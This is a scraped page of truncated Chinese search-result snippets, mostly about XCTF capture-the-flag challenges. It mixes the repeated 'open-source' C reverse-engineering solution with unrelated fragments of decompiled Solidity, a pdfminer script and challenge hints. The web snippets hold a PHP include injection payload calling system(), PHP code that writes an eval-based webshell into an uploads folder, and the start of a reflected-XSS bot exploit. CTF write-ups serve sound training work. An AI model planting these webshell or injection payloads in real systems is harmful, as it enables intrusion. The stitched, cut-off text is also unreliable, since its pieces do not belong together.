XCTF-open-source 下载附件拿到源码。 #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { if (argc != 4) { printf("what?\n"); exit(1); } unsigned int first = atoi(argv[1]); if (first != 0xcafe) { printf("you are wrong, sorry.\n"); exit(2);...
xctf-open-source 这题给了源码,直接IDE打开即可, 很容易就能看出hash就是要求的答案,为了执行到最后一步,就不能执行前面所有的if语句,依次可得first=0xcafe,second%17=8,argv[3]=""h4cky0u",把hash的赋值里的first,second%17和argv[3]全部替换掉,然后把前面的代码全删了直接运行就得到flag 最后的flag是c0f...
xctf新手逆向训练题 这两天在工作之余刷了下xctf的逆向新手题 0x1 open-source 下载文件后可以直接看源码 要求是输入4个参数,第一个参数为’0xcafe’,第二个参数是符合判定条件的int值,第三个参数是’h4cky0u’,然后进行一些数据操作得到hash,并用十六进制方式输出(%x) 编写脚本实现,得到flag为0xc0ffee... ...
# Let's make the world open source #consteth_balance=eth.balance(this.address)def storage:stor0 is addr at storage0stor1 is addr at storage1balanceOf is mappingofuint256 at storage2stor3 is mappingofuint8 at storage3unknown35983396 is mappingofuint256 at storage4defunknown35983396(addr _pa...
一Web_php_include此次考察PHP基本语法 二 步骤 1 进入试题界面 2 访问 /?page=http://127.0.0.1/?hello=<?system("...");?> 三 总结 解题需要了解includestrstrstr_replace system("ls") show_source以及网页的GET方式page中 web_php_include
phpif($f=fopen("./uploads/abc.php","w")){echo"could open&write...";fclose($f);}else{echo"this file is not writable...";}$f=fopen("./uploads/abc.php","w");$content="<?php echo 'write the shell';@eval(\$_POST['ckey']); ?>";fwrite($f,$content);fclose($f);$f=fop...
(path):withopen(path,'rb')asfp:# 用文件对象来创建一个pdf文档分析器praser=PDFParser(fp)# 创建一个PDF文档doc=PDFDocument()# 连接分析器 与文档对象praser.set_document(doc)doc.set_parser(praser)# 提供初始化密码# 如果没有密码 就创建一个空的字符串doc.initialize()# 检测文档是否提供txt转换,...
hint1:先找源码,题目环境正在修复。 Try to find the source code first, the author is fixing the challenge environment. hint2:题目环境已更新http://guaika.txmeili.com:8888/a.php,验证码看不到的可以访问这个159.138.22.212; Challegen environmen has been updated, http://guaika.txmeili.com:8888/a...
view-source:http://seafaring.xctf.org.cn:9999/admin/可以发现后台一些api和参数 handle_message.php 存在反射型XSS bot使用的是firefox浏览器 于是构造html让bot访问 <html> <script> window.onload =function(){ document.getElementById("f").submit(); ...
1. open-source 题目给出了一段代码如下: #include <stdio.h> #include <string.h> intmain(intargc,char*argv[]) { if(argc!=4) { printf("what?\n"); exit(1); } unsignedintfirst=atoi(argv[1]); if(first!=0xcafe) { printf("you are wrong, sorry.\n"); ...